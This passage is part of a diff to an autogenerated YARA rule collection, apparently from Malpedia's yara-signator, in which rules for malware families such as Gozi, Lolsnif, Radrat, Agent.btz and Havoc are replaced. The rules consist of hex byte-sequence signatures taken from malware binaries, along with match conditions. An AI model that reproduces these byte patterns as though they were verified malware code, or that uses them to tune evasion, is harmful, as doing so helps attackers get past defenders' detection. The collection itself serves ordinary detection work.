"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pngdowner_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "1171accd4a2881e0996da43d7ff173c5cb1938e75ca585c448a0136c0ce6d102" + logic_hash = "73611f5253baf7f95cf22059dc76ddead3ab9941ef229c965d83aeede8e284a3" score = 75 quality = 75 tags = "FILE" @@ -153348,32 +156215,32 @@ rule MALPEDIA_Win_Cloudwizard_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 8d85d4fdffff 50 57 c785d4fdffff2c020000 e8???????? } - $sequence_1 = { 668945ee 58 6a7c 668945f0 58 6a6d } - $sequence_2 = { 8d45ec 663118 40 40 } - $sequence_3 = { 8bc8 8d8618060000 8d7802 668b18 40 40 6685db } - $sequence_4 = { ebd6 55 8bec 81ecb80e0000 } - $sequence_5 = { 6a01 897dfc 57 c706???????? 897e30 ff15???????? 894634 } - $sequence_6 = { 8d4530 d1f9 50 8d044e 50 e8???????? } - $sequence_7 = { 668945b8 8d45a0 663108 40 40 663918 } - $sequence_8 = { 40 6685d2 75f6 2bc1 8d8e18060000 } - $sequence_9 = { 6a5b 6689451e 58 6a5c 66894520 58 6a4d } + $sequence_0 = { 8b4508 c705????????01000000 50 a3???????? e8???????? 8db6bcdc4000 bf???????? } + $sequence_1 = { ff15???????? 85c0 a3???????? 741b 6a00 6a00 } + $sequence_2 = { 7552 833c8580e0400000 53 57 } + $sequence_3 = { c74050c0b54000 c7401401000000 c3 56 57 ff15???????? } + $sequence_4 = { c1ff05 83e11f 8b3cbd40e64000 8d0cc9 8d3c8f eb05 bf???????? } + $sequence_5 = { 83c8ff 5b 81c420000100 c3 8b3d???????? 8d4c2420 } + $sequence_6 = { ff74240c e8???????? 83c40c c3 e8???????? 8b4c2404 894814 } + $sequence_7 = { c3 33c0 5e c3 8b442404 c74050c0b54000 } + $sequence_8 = { 8b1d???????? b900400000 33c0 8d7c2420 8d542420 } + $sequence_9 = { ff742404 e8???????? 59 c3 56 8bf1 6a1b } condition: - 7 of them and filesize <134144 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Lolsnif_Auto : FILE +rule MALPEDIA_Win_Xiangoop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d5fbfc8-0217-55f5-a391-424b7e7d3b81" + id = "bc98151f-3c19-5785-9ae3-c69b23dbc040" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lolsnif_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xiangoop_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "9bce9d984017297751bb54a3f5eaf0b3b4bc516f4f45f71420e0fbe5f0438c0a" + logic_hash = "94fbd52db4d5481176ad7bfd7bb74c96cb0ad2e3aa8f7b123dd0955d4f95f88c" score = 75 quality = 75 tags = "FILE" @@ -153387,32 +156254,32 @@ rule MALPEDIA_Win_Lolsnif_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745ecebfecccc 8945f8 895dfc e8???????? 85c0 0f84e6000000 c745fc10000000 } - $sequence_1 = { 8d4510 50 ff35???????? e8???????? 8bf8 85ff 0f8576010000 } - $sequence_2 = { 8945fc 7460 894508 ff35???????? 8b450c ff7510 e8???????? } - $sequence_3 = { 6817010000 1bc0 51 23c6 50 e8???????? e9???????? } - $sequence_4 = { 3bf1 742b 53 8b5f04 } - $sequence_5 = { 8bf8 85ff 754c 8b45fc } - $sequence_6 = { 6a20 50 ff15???????? 3bc3 0f84eb000000 68???????? 50 } - $sequence_7 = { 8b471c 3bc3 7411 50 53 ff35???????? ff15???????? } - $sequence_8 = { 85c0 0f841b020000 50 ff7320 e8???????? 8bf0 } - $sequence_9 = { bf02010000 eb08 ff15???????? 8bf8 } + $sequence_0 = { b801000000 d1e0 8b55f4 0fb6440208 25ff000000 } + $sequence_1 = { c1e903 8d540906 8b4508 8990e0010000 c745ec00000000 8b4d08 } + $sequence_2 = { ebe3 8b45f0 8b0c85a8b00110 8b45ec 807c082800 } + $sequence_3 = { c1e008 0bc8 ba01000000 6bc203 8b550c 0fb644020c 25ff000000 } + $sequence_4 = { 8955c8 6804010000 8d85bcfdffff 50 8b4dc8 } + $sequence_5 = { 81e2ff000000 b801000000 6bc800 8b4510 8854080c 8b4dec } + $sequence_6 = { c3 b001 c3 c705????????80a50110 b001 c3 68???????? } + $sequence_7 = { 8b45fc 8b4dfc 034804 894dfc e9???????? b801000000 8be5 } + $sequence_8 = { 890c02 8b45ec 83c001 8945ec 837dec08 7502 } + $sequence_9 = { 8b45f4 83c028 8945f4 ebcb } condition: - 7 of them and filesize <425984 + 7 of them and filesize <246784 } -rule MALPEDIA_Win_Radrat_Auto : FILE +rule MALPEDIA_Win_Havoc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f52e2c5a-eef0-5772-ac88-55315ac8b12c" + id = "effddaaf-e7fe-58ad-88f4-e26f6d7794a2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.radrat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.havoc_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "a27dfe470245e6a0fc8e1e694300b8057fe423adc6b34415045732f4d66a4882" + logic_hash = "dea553016c43a89176918937bfc9793358dadd2541e82f3880161a16c9ccfd07" score = 75 quality = 75 tags = "FILE" @@ -153426,34 +156293,34 @@ rule MALPEDIA_Win_Radrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8d1cffffff e8???????? c685f0feffff00 c645fc00 8d4dcc e8???????? c745fcffffffff } - $sequence_1 = { c6855497ffff01 c645fc01 8d8d58ffffff e8???????? c745fcffffffff 8d4d80 e8???????? } - $sequence_2 = { 8d8d74ffffff e8???????? 68a0000000 8d8d74ffffff e8???????? 6a30 8d8d74ffffff } - $sequence_3 = { ff15???????? 8b4df4 894168 8b45f4 837868ff 750d ff15???????? } - $sequence_4 = { 8d8dd8feffff e8???????? 8d8d0cffffff 51 8d55c4 52 8b45ec } - $sequence_5 = { e8???????? 8a854c98ffff e9???????? 8b8d24d6ffff 83c15c 51 8b9524d6ffff } - $sequence_6 = { 8d8d50ffffff 51 e8???????? 83c408 8b9548ffffff 83c258 52 } - $sequence_7 = { e9???????? 8d4d9c e8???????? c645fc01 8d8d38ffffff 51 8d4d9c } - $sequence_8 = { 8b4dd8 8b9130010000 52 ff15???????? 8b45d8 c7803001000000000000 8b4dd8 } - $sequence_9 = { 8d8560fbffff 50 8d8da8fdffff e8???????? 89854cf8ffff 8b8d4cf8ffff 898d48f8ffff } + $sequence_0 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 } + $sequence_1 = { 48898424ae000000 4c8d442458 ba2a040000 8b842498000000 4889442448 } + $sequence_2 = { 4488440101 448a440202 4488440102 448a440203 4488440103 4883c004 4883f820 } + $sequence_3 = { 4885c0 7504 31f6 eb08 488b4030 ffc3 } + $sequence_4 = { 55 4c89c5 57 56 4889d6 53 } + $sequence_5 = { 4883ec28 488b410c 488b4904 488d5008 488b05???????? } + $sequence_6 = { 488d4b10 4c8d4c2460 4889442460 8b442478 ba00000002 4c8d842490000000 } + $sequence_7 = { f3a5 488bbc2480000000 488b742460 b934010000 f3a5 } + $sequence_8 = { baff010f00 c744244001000000 4889442444 31c0 85f6 } + $sequence_9 = { 4155 4154 4531e4 55 57 56 53 } condition: - 7 of them and filesize <2080768 + 7 of them and filesize <164864 } -rule MALPEDIA_Win_Agent_Btz_Auto : FILE +rule MALPEDIA_Win_Onhat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bbd1b361-56e8-5c44-8191-97b61949c3a6" + id = "59032243-71bc-5ccf-a304-ec07259d2d04" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agent_btz_auto.yar#L1-L506" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onhat_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "2cf1b97d42e6d02bf37e0a76317aec03ba7908a0448935a35dc2a10793f4265a" + logic_hash = "0a14e4700b595808dab4fc1d09b95f2e90fdba52a26f4d889c5bc554e4997af3" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153465,82 +156332,32 @@ rule MALPEDIA_Win_Agent_Btz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c74608ffffffff f644240801 7409 56 e8???????? 83c404 8bc6 } - $sequence_1 = { ffd6 8d54240c 52 ffd7 } - $sequence_2 = { ffd3 85c0 75d8 5f 5e 5b } - $sequence_3 = { ff15???????? b800000f00 8b4df4 64890d00000000 } - $sequence_4 = { c706???????? c7460c00000000 895e08 895e04 } - $sequence_5 = { b805000f00 8b4df4 64890d00000000 5f 5e } - $sequence_6 = { 895e08 895e04 c7461000000000 895e14 } - $sequence_7 = { 56 6a00 68???????? 8935???????? } - $sequence_8 = { 8b4608 c706???????? 85c0 7413 } - $sequence_9 = { 83f8ff 740e 50 ff15???????? c74608ffffffff f644240801 } - $sequence_10 = { 8d542408 52 c744240c30000000 c744241003000000 } - $sequence_11 = { 6801010000 ff15???????? 85c0 7415 } - $sequence_12 = { 51 6a00 6819000200 6a00 68???????? } - $sequence_13 = { 6a0a 68???????? 6a01 6a00 } - $sequence_14 = { 50 68???????? 6a01 68???????? e8???????? 83c410 } - $sequence_15 = { 6a01 6a04 6a01 68???????? } - $sequence_16 = { 68???????? 6a01 e8???????? 50 e8???????? 83c41c } - $sequence_17 = { 89461c 3dea000000 740b 3de5030000 } - $sequence_18 = { 7511 e8???????? 83c020 50 e8???????? } - $sequence_19 = { 6a01 68???????? e8???????? 83c414 5f 5e } - $sequence_20 = { 50 e8???????? 83c408 6800010000 e8???????? } - $sequence_21 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca 6603c8 } - $sequence_22 = { 59 6a69 66894de8 59 } - $sequence_23 = { 5e 8bc3 5b c9 c3 83c8ff eb11 } - $sequence_24 = { c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f c684249100000063 c684249200000065 } - $sequence_25 = { c68424900000006f c684249100000063 c684249200000065 c684249300000073 c684249400000073 c684249500000057 c684249600000000 } - $sequence_26 = { c684248800000043 c684248900000072 c684248a00000065 c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 } - $sequence_27 = { 57 53 897dfc 897e1c } - $sequence_28 = { 59 6a65 668945f0 66894dec 59 6a25 58 } - $sequence_29 = { 59 6a70 66894dea 59 } - $sequence_30 = { c684241601000074 c684241701000045 c684241801000072 c684241901000072 c684241a0100006f c684241b01000072 } - $sequence_31 = { ebd2 c78424a000000068000000 c78424dc00000001000000 33c0 66898424e0000000 } - $sequence_32 = { c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c c684241401000061 } - $sequence_33 = { 59 6a70 66894de4 8bc8 } - $sequence_34 = { 51 6a05 ff75fc 897df0 } - $sequence_35 = { c684241201000074 c68424130100004c c684241401000061 c684241501000073 c684241601000074 c684241701000045 c684241801000072 } - $sequence_36 = { 6a00 6a27 6a02 6a00 6a01 } - $sequence_37 = { 8d8505feffff 50 e8???????? 83c40c } - $sequence_38 = { c645d316 c645d43a c645d53b c645d63b } - $sequence_39 = { c645cb30 c645cc27 c645cd3b c645ce30 } - $sequence_40 = { 488b4338 33d2 488bce 448d4220 } - $sequence_41 = { 488b4608 488b0e 48894628 488b4638 4c8d4c2450 448bc3 488bd7 } - $sequence_42 = { 4533c9 488bd6 ff90c8010000 8bf8 85c0 } - $sequence_43 = { 488b4638 488b0e 4c8d442450 4533c9 } - $sequence_44 = { 488bf0 c70005000000 85db 7415 4c8b4f38 } - $sequence_45 = { 488b0f 48894108 488b0f 488b4108 48894128 488b0f } - $sequence_46 = { 83c904 c1e803 448bc9 440fafc8 } - $sequence_47 = { 488bcf c744242088130000 e8???????? 488b5738 } - $sequence_48 = { 488b0f 488901 488b07 488338ff } - $sequence_49 = { 488bce 8bd8 ff92e8010000 488b6c2458 8bc3 488b5c2450 } - $sequence_50 = { 488b0f 894130 eb06 488b07 896830 } - $sequence_51 = { 488b07 896830 33c0 488b5c2458 } - $sequence_52 = { 8d8594faffff 50 68???????? ff15???????? } - $sequence_53 = { 013d???????? 8b04b5100b4200 0500080000 3bc8 } - $sequence_54 = { 0304b5100b4200 59 5e eb05 } - $sequence_55 = { 001cbe 40 0023 d18a0688078a 46 } - $sequence_56 = { 030c85100b4200 eb02 8bcb f6412480 } - $sequence_57 = { 0304b5100b4200 59 eb02 8bc3 } - $sequence_58 = { 0304b5100b4200 59 eb05 b8???????? } - $sequence_59 = { 0304b5100b4200 beffff0000 59 59 } + $sequence_0 = { 68???????? e8???????? 83c404 b806000080 5f 5e 5d } + $sequence_1 = { c684242c01000048 889c242d010000 c684242e01000045 c684242f0100004e } + $sequence_2 = { 8d7c2414 bee8030000 f3ab 8b8c2424010000 b8d34d6210 f7e1 c1ea06 } + $sequence_3 = { 88542408 f3ab 8b8c240c200000 88542406 66ab aa 8d842410200000 } + $sequence_4 = { 57 32d2 b9ff070000 33c0 8d7c2409 88542408 } + $sequence_5 = { 53 ff15???????? 8bf0 3bf3 7526 } + $sequence_6 = { 33c9 8a4c2432 8ac7 52 50 c1eb18 51 } + $sequence_7 = { 8d7710 6a00 8d842424010000 56 50 51 e8???????? } + $sequence_8 = { 8d54241c 55 55 52 68???????? 55 55 } + $sequence_9 = { c644242852 c644242955 885c242a c644242b41 c644242c44 c644242d44 c644242e52 } condition: - 7 of them and filesize <5577728 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Unidentified_087_Auto : FILE +rule MALPEDIA_Win_Virtualgate_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "40b9cd18-d110-5435-969b-5dfac9c340c4" + id = "5ab8135e-3bbe-5abd-acc2-717daf53613e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_087_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virtualgate_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "110739d44f9e53e4e50b40a1961bcb5043ade07265d58318b1d26ddc3eb75b3c" + logic_hash = "5ca5297d10bab80aa59720f493a7b89d0ffff3ac0eaaf62e59c4e5ea64ea6f84" score = 75 quality = 75 tags = "FILE" @@ -153554,40 +156371,34 @@ rule MALPEDIA_Win_Unidentified_087_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7453802000000 ff15???????? 83f801 7409 83f80d 0f8581000000 } - $sequence_1 = { 4c8d9c2480020000 498b5b28 498b7330 498be3 415c } - $sequence_2 = { 4d8bcf 4533c0 488d542428 488d4c2450 e8???????? 488d5580 488d4c2450 } - $sequence_3 = { 895c2420 48895908 4c8bf1 488948c8 } - $sequence_4 = { 40b601 488bcb ff15???????? 400fb6c6 } - $sequence_5 = { ff15???????? 483905???????? 752b 8b442460 3905???????? 751f } - $sequence_6 = { eb09 488b05???????? 33d2 8d3c10 488b4c2450 48634104 f644046006 } - $sequence_7 = { 488d68a1 4881ece0000000 48c745c7feffffff 48895810 48897818 488b05???????? 4833c4 } - $sequence_8 = { c6864b01000043 c7466870040210 6a0d e8???????? 59 8365fc00 ff7668 } - $sequence_9 = { 89430c 8d4310 8d89a4080210 5a 668b31 } - $sequence_10 = { 6a10 57 ff15???????? 6a00 6a00 6a00 8d8584feffff } - $sequence_11 = { c745e40f000000 895de0 885dd0 8d45d0 50 } - $sequence_12 = { ff15???????? 50 8dbdf8feffff e8???????? 83c404 5f } - $sequence_13 = { c705????????25ca0010 8935???????? a3???????? ff15???????? a3???????? 83f8ff } - $sequence_14 = { 7461 8d0cbd602c0210 8901 8305????????20 8b11 } - $sequence_15 = { 85c9 7410 8b14b8 8911 8b0d???????? } + $sequence_0 = { 4157 4883ec38 4c63e9 488bf2 498bc5 488d0dc7f10000 } + $sequence_1 = { 4b8794fed02a0200 eb2d 4c8b15???????? ebb8 4c8b15???????? 418bc2 b940000000 } + $sequence_2 = { 8d58b0 498bce 448bc3 488d1580bd0000 e8???????? 85c0 7429 } + $sequence_3 = { ff15???????? c705????????00001000 eb26 4183f802 } + $sequence_4 = { 488bc8 ff15???????? 3b05???????? 488bcb 89442450 7608 } + $sequence_5 = { 48894527 498bc0 48ffc0 41381407 75f7 498bc8 48ffc1 } + $sequence_6 = { 4c8d05b4d30000 488d15b1d30000 e8???????? 4885c0 7416 } + $sequence_7 = { 488bf5 4803d2 498b94d750b50100 e8???????? 85c0 } + $sequence_8 = { 4c8d058dbe0100 488bd5 48c1fa06 4c893403 488bc5 } + $sequence_9 = { 488b8c2420800200 4833cc e8???????? 488b9c2450800200 } condition: - 7 of them and filesize <462848 + 7 of them and filesize <323584 } -rule MALPEDIA_Win_Gozi_Auto : FILE +rule MALPEDIA_Win_Webc2_Rave_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4c65f4c6-680c-5313-afa1-f0c350a0bb9e" + id = "ea4a2e95-f571-5243-9ef5-0d9d72800185" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gozi_auto.yar#L1-L297" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_rave_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "d1afd0d2426cb263c17dc36f11639d4b538234ba95ec55283f83783334fcf5d3" + logic_hash = "2cbb2512779b7c01486a2ad87d98dfe34ac5aeaa8fcccabe432ae13b764de599" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153599,54 +156410,32 @@ rule MALPEDIA_Win_Gozi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4dfc f3a4 b0e9 aa } - $sequence_1 = { ee 7f7b 36110b 33745571 de7e75 cd18 4a } - $sequence_2 = { 3327 72e7 3ebb4a68d947 d93e 257296bc4a 1b6b61 9f } - $sequence_3 = { e8???????? 0bc0 7522 6a01 6a00 } - $sequence_4 = { 2bfb 8b5518 8b12 6a00 } - $sequence_5 = { 4e b64e 0fc0d6 69d5920d9cef } - $sequence_6 = { 0fadce 80eede c0ca12 2af4 8af4 } - $sequence_7 = { 894598 50 e8???????? 8b4650 8b7c0704 } - $sequence_8 = { 83c101 894df4 8b55ec 83ea02 3955f4 0f8d45040000 } - $sequence_9 = { 94 6e 8ee1 54 } - $sequence_10 = { 7516 c78554ffffff06000000 c78558ffffff00000000 eb14 } - $sequence_11 = { bf???????? 8bdf c70747494638 66c747043761 83c706 8b450c } - $sequence_12 = { c9 50 0c73 0e 96 3b5375 } - $sequence_13 = { ffd7 03f0 56 53 33f6 56 } - $sequence_14 = { ad b710 2dc7ce5bbb d6 b6c6 } - $sequence_15 = { ff75e4 ffd0 c3 6a68 68???????? e8???????? } - $sequence_16 = { 0f8229feffff 5f 5e 5b c9 c21000 } - $sequence_17 = { c9 c20800 6a00 8d87950c0000 } - $sequence_18 = { 84c1 0fb3ea f6c1ba 0fce } - $sequence_19 = { 96 3b5375 60 d3e0 90 48 } - $sequence_20 = { 69d5ca659407 f6de c645ff61 a1???????? 8b0d???????? 6a00 } - $sequence_21 = { 83c101 894d90 0fb755e4 52 8b4590 } - $sequence_22 = { b87e8da638 e022 3a56b9 036890 2b02 9a102a6715fb53 } - $sequence_23 = { dc6f1b 95 bf633629a8 02738f } - $sequence_24 = { 83bd54ffffff03 7c0a c78554ffffff00000000 eb95 33c0 8b55f4 } - $sequence_25 = { 0fbe4415ec 8b8d4cffffff 038d58ffffff 0fbe11 33d0 8b854cffffff } - $sequence_26 = { 41 4e 75ea 5e } - $sequence_27 = { 0f8447010000 83f8ff 0f843e010000 682000cc00 56 } - $sequence_28 = { 837df800 75c7 ff75fc e8???????? c9 } - $sequence_29 = { 0fb3ce 86d6 2af4 b252 b0ca c745fc00000000 } - $sequence_30 = { e8???????? 59 8bf0 89b5e0f2ffff } - $sequence_31 = { 85c0 7404 8365f800 85f6 7407 8b06 } + $sequence_0 = { 0f8454010000 8b35???????? 8d542414 6a00 } + $sequence_1 = { 0f84ea000000 8d542414 6a00 52 8d44241a 6a01 } + $sequence_2 = { 56 68???????? 53 52 ffd7 3bc3 894614 } + $sequence_3 = { f7d1 49 3bd9 72e5 } + $sequence_4 = { 8d442418 50 51 e8???????? 85c0 74b1 } + $sequence_5 = { 895c2448 ffd7 3bc3 894610 7517 } + $sequence_6 = { 7418 8b742418 46 4f } + $sequence_7 = { 33c9 33f6 85ed 7e45 8b942414020000 53 } + $sequence_8 = { 03d1 8bca 894c2414 7872 } + $sequence_9 = { e8???????? 83c404 ff15???????? 85ff } condition: - 7 of them and filesize <568320 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Boxcaon_Auto : FILE +rule MALPEDIA_Win_Madmax_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5" + id = "230eedbf-6cae-5fdd-90b6-aea0b58f95e1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boxcaon_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.madmax_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a" + logic_hash = "8fadf42f6b346841d23791b849b5705de38f9f89679dc44544ef7b477d437506" score = 75 quality = 75 tags = "FILE" @@ -153660,32 +156449,32 @@ rule MALPEDIA_Win_Boxcaon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? } - $sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 } - $sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? } - $sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a } - $sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff } - $sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 } - $sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? } - $sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? } - $sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 } - $sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 } + $sequence_0 = { d0cd 99 86d6 4c ae 2f 4e } + $sequence_1 = { b80c32e173 8ac5 08679e fb 59 8050cb80 baef812a0a } + $sequence_2 = { e07d d8cc 6a55 60 25a237f301 4a 4c } + $sequence_3 = { 8d8dd0feffff e8???????? 8db396000000 6a3b 9c f605????????d6 0f851c010000 } + $sequence_4 = { 93 9f 856d67 664c 8657b6 49 152b9be0c2 } + $sequence_5 = { d9dd 095527 17 44 4b 60 1f } + $sequence_6 = { f723 56 c8d95bcc 0e 64a04d98f5db 6e 051e079cc8 } + $sequence_7 = { ad 7ea5 6abd 650e 9c 3528e563a7 6c } + $sequence_8 = { f605????????e2 0f851d010000 73e7 f22486 85e6 210a e788 } + $sequence_9 = { f605????????a5 7531 df2e 8b1b f8 b36a 7928 } condition: - 7 of them and filesize <256000 + 7 of them and filesize <3227648 } -rule MALPEDIA_Win_Gophe_Auto : FILE +rule MALPEDIA_Win_Mole_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16e0cb01-a4d6-50a6-a1a9-0b51a47ac5bb" + id = "36f8515b-9850-5f6a-9da2-fab216acb0f1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gophe_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mole_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "76443f258bf0b4ec57a2e148e70e44580d537156fff783e9c0d09eeae8abd68d" + logic_hash = "9e8bd455bb765e10346652a5931be596133d0a24ad14fb98b5a58db6c1dd57c3" score = 75 quality = 75 tags = "FILE" @@ -153699,38 +156488,32 @@ rule MALPEDIA_Win_Gophe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 833902 0f94c0 84c0 7407 } - $sequence_1 = { b905000000 ff15???????? 8b05???????? 85c0 } - $sequence_2 = { 56 8b7510 57 68???????? c70605000000 } - $sequence_3 = { b801000000 eb09 83c8ff eb04 } - $sequence_4 = { 51 a1???????? 33c5 50 8d45f4 64a300000000 68e0000000 } - $sequence_5 = { 5b 8be5 5d c3 b896ffffff } - $sequence_6 = { 64a300000000 68e0000000 e8???????? 83c404 } - $sequence_7 = { 6805010000 8d85e0fdffff 50 68???????? } - $sequence_8 = { 85c9 0f94c0 89431c 85c9 } - $sequence_9 = { 7838 488b4c2440 ff15???????? 8bf8 } - $sequence_10 = { 2bf0 b8abaaaa2a f7ee c1fa03 8bf2 } - $sequence_11 = { 8bf8 488b4c2440 488b01 ff5010 85ff } - $sequence_12 = { e8???????? 488d942488000000 488d4c2460 e8???????? } - $sequence_13 = { c684249000000000 488b542440 488b4a10 668379300b } - $sequence_14 = { 6a00 56 e8???????? 83c40c c706ffffffff } - $sequence_15 = { 5d c3 b896ffffff 5f 5e 5b } + $sequence_0 = { 81bdf0fdffff99000000 0f8787710000 8b95f0fdffff 0fb68248c04000 ff248514c04000 81bdf0fdffffd3a7d105 0f8794000000 } + $sequence_1 = { 6bc000 0385bcf9ffff 898588e5ffff 837d1401 751a 68???????? 68???????? } + $sequence_2 = { 81bdf0fdffffcde5d405 0f8458400000 81bdf0fdffff41e6d405 0f849e440000 81bdf0fdffff44e6d405 0f84742c0000 e9???????? } + $sequence_3 = { e9???????? 81bdf0fdffff5625d105 0f8786000000 81bdf0fdffff5625d105 0f8494710000 81bdf0fdffffc624d105 7745 } + $sequence_4 = { 8d959cefffff 52 68???????? 6801000080 ff15???????? 898584efffff 8d85d4fbffff } + $sequence_5 = { 8d85ace4ffff 50 6a05 68???????? 8b8dc4e4ffff 51 ff15???????? } + $sequence_6 = { c7802ceb410002000000 6a04 58 6bc000 8b0d???????? 894c05f8 6a04 } + $sequence_7 = { 8d9530e2ffff 52 e8???????? 83c404 6a64 68???????? 8d85ecfbffff } + $sequence_8 = { 83c410 8d959cf9ffff 52 8b8590e5ffff } + $sequence_9 = { e8???????? e8???????? 898580f7ffff 81bd80f7ffff00300000 7575 6a00 } condition: - 7 of them and filesize <1582080 + 7 of them and filesize <297984 } -rule MALPEDIA_Win_Kuaibu8_Auto : FILE +rule MALPEDIA_Win_Bohmini_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "91f1248d-ab2b-5079-b9e0-a51e87297924" + id = "c674d076-0d8a-5cd0-a61f-b74753074ae4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kuaibu8_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" + source_url = 